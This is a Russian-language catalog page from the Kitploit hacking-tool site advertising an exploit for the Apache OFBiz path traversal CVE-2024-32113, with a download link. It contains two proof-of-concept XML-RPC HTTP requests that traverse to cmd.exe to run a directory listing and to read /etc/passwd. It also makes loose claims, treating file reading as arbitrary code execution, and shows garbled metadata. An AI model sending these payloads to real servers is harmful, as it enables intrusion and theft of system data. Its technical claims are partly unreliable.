Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/absholi7ly/apache-ofbiz-directory-traversal-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийЭксфильтрация данныхВеб-безопасностьТестирование на Проникновение
GitHubabsholi7ly/apache-ofbiz-directory-traversal-exploit

Apache-OFBiz-Directory-Traversal-exploit

Эксплойт для Apache OFBiz CVE-2024-32113 — обход пути через специально сформированные XML-RPC запросы, позволяющий читать произвольные файлы и потенциально выполнять команды на уязвимых серверах.

Репозиторий
16342 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Apache-OFBiz-Directory-Traversal-exploit

Критическая уязвимость была обнаружена в Apache OFBiz до версии 18.12.12. Затронута неизвестная функциональность. Манипуляция с неизвестным входным параметром приводит к уязвимости обхода пути. Продукт использует внешний ввод для построения имени пути, которое должно идентифицировать файл или каталог, расположенный внутри ограниченной родительской директории, но продукт не нейтрализует должным образом специальные элементы в имени пути, которые могут привести к тому, что путь разрешится в расположение за пределами ограниченной директории. Затрагиваются конфиденциальность, целостность и доступность.

Введение

  • Уязвимость CVE-2024-32113 позволяет выполнить произвольный код на сервере Apache OFBiz путём отправки специально сформированного HTTP-запроса.
  • В этом запросе атакующий использует параметр ../../../../../../etc/passwd, чтобы указать на файл etc/passwd на сервере Apache OFBiz.
  • Когда сервер Apache OFBiz обрабатывает этот запрос, он попытается прочитать файл etc/passwd, содержащий конфиденциальную информацию о пользователях сервера.
  • Эта информация может быть использована для проведения дальнейших атак на сервер, таких как кража данных, их изменение или даже удаление.

PoC

1-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>performCommand</methodName>
  <params>
    <param>
      <value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
    </param>
  </params>
</methodCall>

ИЛИ

2-

root@kitploit:~
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml

<?xml version="1.0"?>
<methodCall>
  <methodName>example.createBlogPost</methodName>
  <params>
    <param>
      <value><string>../../../../../../etc/passwd</string></value>
    </param>
  </params>
</methodCall>
Скачать инструмент